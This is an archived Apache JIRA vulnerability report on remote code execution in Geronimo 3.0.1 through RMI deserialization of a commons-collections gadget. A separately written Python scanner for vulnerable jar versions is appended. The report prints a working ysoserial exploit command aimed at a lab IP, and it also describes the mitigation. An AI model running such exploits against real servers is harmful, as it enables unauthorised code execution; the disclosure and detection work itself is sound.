geronimo-dev mailing list archives

From "sevck (JIRA)" <j...@apache.org>
Subject [jira] [Created] (GERONIMO-6596) Apache Geronimo Remote Code Execute Vulnerability
Date Wed, 29 Nov 2017 02:22:00 GMT
sevck created GERONIMO-6596:
-------------------------------

             Summary: Apache Geronimo Remote Code Execute Vulnerability
                 Key: GERONIMO-6596
                 URL: https://issues.apache.org/jira/browse/GERONIMO-6596
             Project: Geronimo
          Issue Type: Bug
      Security Level: public (Regular issues)
          Components: dependencies, security
    Affects Versions: 3.0.1
         Environment: linux,windows
            Reporter: sevck
            Priority: Critical


The unsupported old Geronimo versions may also be affected.

Description:
Apache Geronimo enables the Java RMI port 1099 by default and binds it to IP 0.0.0.0 by default. In bash,
I used the command "grep -R InvokerTransformer" and found that it uses commons-collections-3.2.1.jar by default.

[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches

This looks like Java deserialization is taken for granted. But when I used the ysoserial tool's CommonsCollections1
payload, the response was:
java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap (no security
manager: RMI class loader disabled)
This seems to be a classpath error. In the Java 7u21 changelog:
-------------------------------------
Changes to RMI
From this release, the RMI property java.rmi.server.useCodebaseOnly is set to true by
default. In previous releases the default value was false.

This change of default value may cause RMI-based applications to break unexpectedly. The typical
symptom is a stack trace that contains a java.rmi.UnmarshalException containing a nested java.lang.ClassNotFoundException.

For more information, see RMI Enhancements.
---------------------------------------
So, run the application with 7u21.
Attack server:
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"


Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2.
The ports should not be allowed for public access.
Exploit:
(precondition: the server runs JRE version 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by jianan.huang, a security researcher with QingTeng Cloud Security (Minded Security).



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
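An added example (my own code, not part of this report or of the Geronimo project) that turns the reporter's "grep -R InvokerTransformer" check into a version-aware scan of the Maven-style repository directory shown in the report. It assumes the layout repository/<group path>/<artifact>/<version>/<artifact>-<version>.jar and the known fix versions: commons-collections 3.2.2 and commons-collections4 4.1 are the first releases that refuse to deserialize InvokerTransformer and the other unsafe functors unless the system property org.apache.commons.collections.enableUnsafeSerialization is set to true. The sample jars it builds are constructed placeholders (class-file magic bytes only), not real bytecode. The point the grep alone misses: a patched 3.2.2 jar still ships the InvokerTransformer class and still matches the grep, so the artifact version is what decides exposure.

```python
"""Version-aware scan for deserialization-gadget jars in a Geronimo-style
Maven repository.  Added example, not code from the JIRA report or from
Geronimo.  Assumes the repository layout seen in the report and the fix
versions below (3.2.2 / 4.1 disable unsafe functor serialization)."""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Tuple

# First releases that disable serialization of the unsafe functors by default.
FIXED_VERSIONS: Dict[str, Tuple[int, ...]] = {
    "commons-collections": (3, 2, 2),
    "commons-collections4": (4, 1),
}
GADGET_CLASSES = (
    "org/apache/commons/collections/functors/InvokerTransformer.class",
    "org/apache/commons/collections4/functors/InvokerTransformer.class",
)
JAR_RE = re.compile(r"^(?P<artifact>commons-collections4?)-(?P<version>[^/]+)\.jar$")


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.2.1' -> (3, 2, 1); stops at the first non-numeric piece ('-SNAPSHOT')."""
    parts: List[int] = []
    for piece in re.split(r"[.\-]", text):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_unsafe_by_default(artifact: str, version: str) -> bool:
    """True when the artifact predates the release that disabled the gadget."""
    fixed = FIXED_VERSIONS.get(artifact)
    return fixed is not None and parse_version(version) < fixed


def jar_ships_gadget_class(path: str) -> bool:
    """True if the jar contains an InvokerTransformer class file (any version)."""
    try:
        with zipfile.ZipFile(path) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return False
    return any(cls in names for cls in GADGET_CLASSES)


def scan_repository(root: str) -> List[Dict[str, object]]:
    """Walk the repository and report every commons-collections jar found."""
    findings: List[Dict[str, object]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            m = JAR_RE.match(name)
            if not m:
                continue
            path = os.path.join(dirpath, name)
            artifact, version = m.group("artifact"), m.group("version")
            findings.append({
                "path": os.path.relpath(path, root).replace(os.sep, "/"),
                "artifact": artifact,
                "version": version,
                "ships_gadget_class": jar_ships_gadget_class(path),
                "unsafe_by_default": is_unsafe_by_default(artifact, version),
            })
    findings.sort(key=lambda f: str(f["path"]))
    return findings


def build_sample_repository(root: str) -> None:
    """Create constructed sample jars (placeholder bytes, not real bytecode)
    in the layout the report shows, so the scan can run offline."""
    samples = [
        ("commons-collections", "commons-collections", "3.2.1", GADGET_CLASSES[0]),
        ("commons-collections", "commons-collections", "3.2.2", GADGET_CLASSES[0]),
        ("org/apache/commons", "commons-collections4", "4.0", GADGET_CLASSES[1]),
        ("org/apache/commons", "commons-collections4", "4.1", GADGET_CLASSES[1]),
    ]
    for group_path, artifact, version, cls in samples:
        d = os.path.join(root, *group_path.split("/"), artifact, version)
        os.makedirs(d, exist_ok=True)
        with zipfile.ZipFile(os.path.join(d, f"{artifact}-{version}.jar"), "w") as zf:
            zf.writestr(cls, b"\xca\xfe\xba\xbe")  # class-file magic only


def demo_findings() -> List[Dict[str, object]]:
    """Build the constructed repository in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="geronimo-repo-")
    build_sample_repository(root)
    return scan_repository(root)


if __name__ == "__main__":
    import sys
    results = scan_repository(sys.argv[1]) if len(sys.argv) > 1 else demo_findings()
    for f in results:
        verdict = "UNSAFE " if f["unsafe_by_default"] else "ok     "
        print(f"{verdict} {f['artifact']}-{f['version']}  "
              f"ships InvokerTransformer={f['ships_gadget_class']}  {f['path']}")
```

Run it against a real installation with the repository directory as the argument (for the layout in the report, that is the "repository" directory under the Geronimo install root); with no argument it scans the constructed sample repository. Upgrading the jar only removes the default gadget; the RMI registry on 1099 still deserializes attacker-supplied objects, so restricting the bind address and network access, as the report's mitigation says, remains necessary.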
